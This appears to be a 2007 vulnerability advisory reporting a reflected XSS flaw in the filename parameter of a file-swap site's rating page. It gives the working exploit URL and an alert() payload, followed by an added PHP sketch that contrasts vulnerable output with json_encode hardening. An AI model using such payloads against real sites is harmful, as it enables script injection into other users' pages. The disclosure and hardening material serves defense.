kaneda@bohater.net
+
Subject:
XSS bug for www.file-swap.com
+
Version:
2007.06.04
+
Discovered by:
Kanedaaa: http://kaneda.bohater.net
+
www.file-swap.com Description:
Give one file - get one free !
+
Description:
XSS IN:
http://www.file-swap.com/rating.php?filename=tak%22);alert('zupa');%3C/script%3E
Sent data:
");alert('zupa');</script>
It's nothing special, because this site has no authentication of any kind.
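
Added example, not part of the original advisory and not file-swap.com's code: the sent data only works if the filename value is echoed inside a double-quoted JavaScript string in an inline script block, so the sketch below models that output context in its raw form and in an encoded form. The function names and showRating() are hypothetical; the source of rating.php is not on the page.

```php
<?php
declare(strict_types=1);

// Added example. Assumption: the "filename" value lands inside a
// double-quoted JavaScript string within an inline <script> block,
// which is the context the advisory's payload implies.
// showRating() is a hypothetical function name.

// Vulnerable form: raw concatenation into the script block.
function render_vulnerable(string $filename): string
{
    return '<script>showRating("' . $filename . '");</script>';
}

// Hardened form: json_encode() emits a complete, quoted JS string literal.
// The JSON_HEX_* flags turn <, >, &, ' and " into \uXXXX escapes, so the
// value can neither close the string nor end the <script> element.
function render_hardened(string $filename): string
{
    try {
        $literal = json_encode(
            $filename,
            JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
                | JSON_THROW_ON_ERROR
        );
    } catch (JsonException $e) {
        // Invalid UTF-8 cannot be encoded; fall back to an empty value.
        $literal = '""';
    }
    return '<script>showRating(' . $literal . ');</script>';
}

// The value from the advisory URL, after URL-decoding by the server.
$sent = 'tak");alert(\'zupa\');</script>';

echo render_vulnerable($sent), "\n";
echo render_hardened($sent), "\n";
```

htmlspecialchars() alone is the wrong encoder for this context, since the value sits inside script code rather than HTML text; the encoder has to match the place where the value is written.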
Timeline:
2007.06.04 bug discovered
2007.06.04 bug sent via http://www.file-swap.com/info/contact
Original Advisory:
http://kaneda.bohater.net/security/20070604-xss-file-swap.com.php